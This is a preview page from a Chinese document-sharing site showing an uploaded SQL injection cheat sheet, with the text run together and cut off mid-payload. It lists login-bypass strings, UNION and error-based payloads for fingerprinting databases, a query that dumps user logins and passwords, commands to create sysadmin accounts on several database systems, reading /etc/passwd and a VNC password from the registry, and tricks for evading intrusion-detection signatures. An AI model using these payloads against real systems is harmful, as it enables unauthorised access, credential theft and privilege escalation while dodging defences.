返回
sql注射资料入侵检测

sql注射资料入侵检测

ID:6678969

大小:29.50 KB

页数:8页

时间:2018-01-22

sql注射资料入侵检测_第1页
sql注射资料入侵检测_第2页
sql注射资料入侵检测_第3页
sql注射资料入侵检测_第4页
sql注射资料入侵检测_第5页
资源描述:

《sql注射资料入侵检测》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、SQL注射资料入侵检测SQL注射资料入侵检测1.SQL注射是一种通过网页输入一个查询命令或者一条指令进行欺骗的方法,很多站点都是从用户的用户名,密码甚至email获取用户的参数。他们都使用SQL查询命令。2.首先你用简单的进行尝试。-Login:'or1=1---Pass:'or1=1---http://website/index.asp?id='or1=1--这些是简单的方法,其他如下:-'having1=1---'groupbyuseridhaving1=1---'SelectnameFROMsyscolum

2、nsWhereid=(SelectidFROMsysobjectsWherename='tablename')---'unionselectsum(columnname)fromtablename--3.收集信息-'or1in(select@@version)---'unionallselect@@version--/*这个优秀这些能找到计算机,操作系统,补丁的真实版本。4.数据类型oracle扩展-->SYS.USER_OBJECTS(USEROBJECTS)-->SYS.USER_VIEWS-->SYS.US

3、ER_TABLES-->SYS.USER_VIEWS-->SYS.USER_TAB_COLUMNS-->SYS.USER_CATALOG-->SYS.USER_TRIGGERS-->SYS.ALL_TABLES-->SYS.TABMySQL数据库,C:WINDOWS>typemy.ini得到root密码-->mysql.user-->mysql.host-->mysql.dbMSaccess-->MsysACEs-->MsysObjects-->MsysQueries-->MsysRelationshipsMS

4、SQLServer-->sysobjects-->syscolumns-->systypes-->sysdatabases5.获取密码';begindeclare@varvarchar(8000)set@var=':'select@var=@var+'+login+'/'+password+''fromuserswherelogin>@varselect@varasvarintotempend--'and1in(selectvarfromtemp)--';droptabletemp--6.创建数据库帐号10.MS

5、SQLexecsp_addlogin'name','password'execsp_addsrvrolemember'name','sysadmin'加为数据库管理员MySQLInsertINTOmysql.user(user,host,password)VALUES('name','localhost',PASSWORD('pass123'))AccessCRATEUSERnameIDENTIFIEDBY'pass123'Postgres(requiresUnixaccount)CRATEUSERnameWIT

6、HPASSWORD'pass123'oracleCRATEUSERnameIDENTIFIEDBYpass123TEMPORARYTABLESPACEtempDEFAULTTABLESPACEusers;GRANTCONNECTTOname;GRANTRESOURCETOname;7.MYSQL操作系统交互作用-'unionselect1,load_file('/etc/passwd'),1,1,1;这里用到load_file()函数8.服务器名字与配置-'and1in(select@@servername)--

7、-'and1in(selectservernamefrommaster.sysservers)--9.从注册表中获取VNC密码-';declare@outbinary(8)-execmaster..xp_regread-@rootkey='HKEY_LOCAL_MACHINE',-@key='SOFTWAREORLWinVNC3Default',/*VNC4路径略有不同-@value_name='password',-@value=@outoutput-selectcast(@outasbigint)asx

8、intoTEMP---'and1in(selectcast(xasvarchar)fromtemp)--10.逃避标识部分信号Evading'or1=1Signature-'or'unusual'='unusual'-'or'something'='some'+'thing'-'or'text'=N'text'-'or'something'like'some%'-'or2

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。